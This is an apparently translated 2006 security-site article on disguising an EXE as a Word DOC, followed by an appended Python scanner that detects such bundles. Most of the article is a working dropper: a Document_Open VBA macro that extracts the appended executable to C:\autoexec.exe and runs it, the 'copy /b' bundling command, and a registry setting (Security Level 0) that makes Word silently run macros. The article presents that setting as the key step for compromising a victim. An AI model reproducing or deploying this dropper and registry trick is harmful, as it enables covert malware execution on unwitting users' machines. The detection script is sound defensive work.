Converting an EXE file into DOC file format - vulnerability warning - the black bar safety net

ID MYHACK58:6220069775
Type myhack58
Reporter Anonymous
Modified 2006-06-14T00:00:00


This "conversion" is not a change of file format at all: the EXE file is simply appended to the end of a DOC file. That DOC file is of course not an ordinary Word document; it contains a macro which, when it runs, reads the EXE data from the end of its own file and executes it, creating the illusion that opening the document runs the EXE file. (The principle is very much like a file binder!)

Anyone familiar with VB knows that Word macros are written in VBA, whose syntax is the same as VB's, though some VB methods are missing; macro viruses, for example, use macro copying statements to infect their targets. As in VB, we can write a macro that calls the Windows API! First, the API functions this macro needs:

1) CreateFile is used to open the file. Its VB declaration is as follows:

Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long

2) CloseHandle is used to close an open file handle. Its VB declaration is as follows:

Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

3) ReadFile is used to read data from an open file. Its VB declaration is as follows:

Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long

4) WriteFile is used to write the data that was read out to a file. Its VB declaration is as follows:

Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long

5) SetFilePointer moves the file pointer. Its VB declaration is as follows:

Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, ByVal lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long

6) The following are the constants used as parameters to these functions:

Public Const GENERIC_READ As Long = &H80000000

Public Const GENERIC_WRITE As Long = &H40000000

Public Const FILE_SHARE_READ As Long = 1

Public Const FILE_SHARE_WRITE As Long = 2

Public Const CREATE_NEW As Long = 1

Public Const CREATE_ALWAYS As Long = 2

Public Const OPEN_EXISTING As Long = 3

Public Const OPEN_ALWAYS As Long = 4

Public Const TRUNCATE_EXISTING As Long = 5

Public Const INVALID_HANDLE_VALUE As Long = -1

Public Const FILE_ATTRIBUTE_NORMAL As Long = &H80

With that preparation done, we can start. Running Word 2000, open the Visual Basic Editor, create a new module, and paste the function and constant declarations above into it. Then go back to the "ThisDocument" code view, select the Document Open event, and enter this code:

Private Sub Document_Open()
    Dim buffer(65536) As Byte
    Dim h As Long, h2 As Long, j As Long, i As Long, k As Long

    ' Open its own DOC file in SHARE_READ mode
    h = CreateFile(ThisDocument.Path & "\" & ThisDocument.Name, GENERIC_READ, FILE_SHARE_READ + FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)

    ' Create a new EXE file to hold the data that is read out
    h2 = CreateFile("c:\autoexec.exe", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)

    If h = INVALID_HANDLE_VALUE Or h2 = INVALID_HANDLE_VALUE Then
        Exit Sub
    End If

    ' Move the file pointer to the junction between the DOC data and the EXE data
    k = SetFilePointer(h, 32768, 0, 0)

    Do
        i = ReadFile(h, buffer(0), 65536, j, 0)
        i = WriteFile(h2, buffer(0), j, j, 0)
    Loop Until j < 65536

    CloseHandle (h)
    CloseHandle (h2)

    ' Run the EXE file
    Shell "c:\autoexec.exe"
End Sub

With the macro written, pay attention to the value passed to SetFilePointer above: 32768 is the size of the DOC file after you have saved it with the finished macro inside. It is not always 32768, so everyone take note!

You may be wondering how the EXE file is then turned into the DOC file. Very simple: put the EXE you want to bundle in the same directory as this DOC file and run the DOS command:

copy /b xxxx.doc + xxxxx.exe newdoc.doc

That is all. When NEWDOC.DOC is opened, the macro reads the EXE file back out, stores it as C:\AUTOEXEC.EXE, and then runs it. Frightening, isn't it? However, this only works when Word 2000's security level is at its lowest. On the subject of this security setting, we also found a small Microsoft bug. Look at this registry key:

HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security

and its Level value. When the security level is 3 (High), Word will not run any macro; at 2 (Medium), Word asks you whether to run the macro; at 1 (Low), Word automatically runs all macros! But a security level set to Low is easily noticed. The clever reader must be wondering: what if this value becomes 0? If it is set to 0, Word displays the security level as High, yet it automatically runs any macro!! Isn't that an exaggeration?? Is a back door like this in the registry just MS's backdoor?

For the victim's machine to accept your DOC file and run it smoothly, the most important thing is to set Word's security value in the registry to 0. How to change it?? There are too many ways; malicious IE code alone offers plenty. In addition, if a web page links to the DOC, IE downloads the DOC file automatically! MS's risk!!!

I would not dare call this a vulnerability, but preventing it is really hard: either you constantly monitor the registry, or you do without Word? That is too passive. The most important thing is careful prevention: do not accept files from strangers, including non-EXE files. We have now found that a DOC file can hide an EXE file; someone will find other file types that can hide an EXE too, so everyone be careful.
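One concrete check for the bundling described above, as an added example that is not part of the original article: a Python scan that reports a PE executable glued after a DOC's OLE container, the layout `copy /b` produces, with the cut at the original document size (32768 in the article). The OLE signature and the sample bundle below are constructed for the demonstration.

```python
import struct
from typing import Optional

# Constructed constant: every OLE compound file (the .doc container Word 2000
# writes) starts with this 8-byte signature.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def find_appended_pe(data: bytes, start: int = 512) -> Optional[int]:
    """Return the offset of a PE executable found at or after `start`, else None.

    A 'copy /b doc + exe' bundle leaves the EXE's DOS header ('MZ') intact; at
    the offset stored in e_lfanew (DOS header field 0x3C) the 'PE\\0\\0'
    signature must follow. Requiring both avoids false hits on a stray 'MZ'.
    """
    pos = data.find(b"MZ", start)
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            # Sanity bound on e_lfanew: real headers keep it small.
            if 0x40 <= e_lfanew < 0x1000 and data[pe:pe + 4] == b"PE\x00\x00":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return None


def scan_doc(data: bytes) -> dict:
    """Classify a file: not an OLE document, a clean one, or one with a PE appended."""
    if data[:8] != OLE_MAGIC:
        return {"ole": False, "appended_pe_at": None}
    return {"ole": True, "appended_pe_at": find_appended_pe(data)}


def build_sample(doc_size: int = 32768) -> bytes:
    """Constructed input: a fake 32 KiB OLE 'document' with a fake PE glued on,
    the layout the article's macro expects (EXE data starting at 32768)."""
    doc = OLE_MAGIC + b"\x00" * (doc_size - 8)
    dos_header = bytearray(b"MZ" + b"\x00" * 0x7E)   # 0x80-byte DOS header
    struct.pack_into("<I", dos_header, 0x3C, 0x80)    # e_lfanew -> PE signature
    exe = bytes(dos_header) + b"PE\x00\x00" + b"\x00" * 252
    return doc + exe


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(scan_doc(blob))
```

A legitimate document may embed an executable as an OLE Package object, so a hit means "inspect this file", not proof of a bundle; the scan also does not walk the OLE FAT to prove the hit lies outside the container.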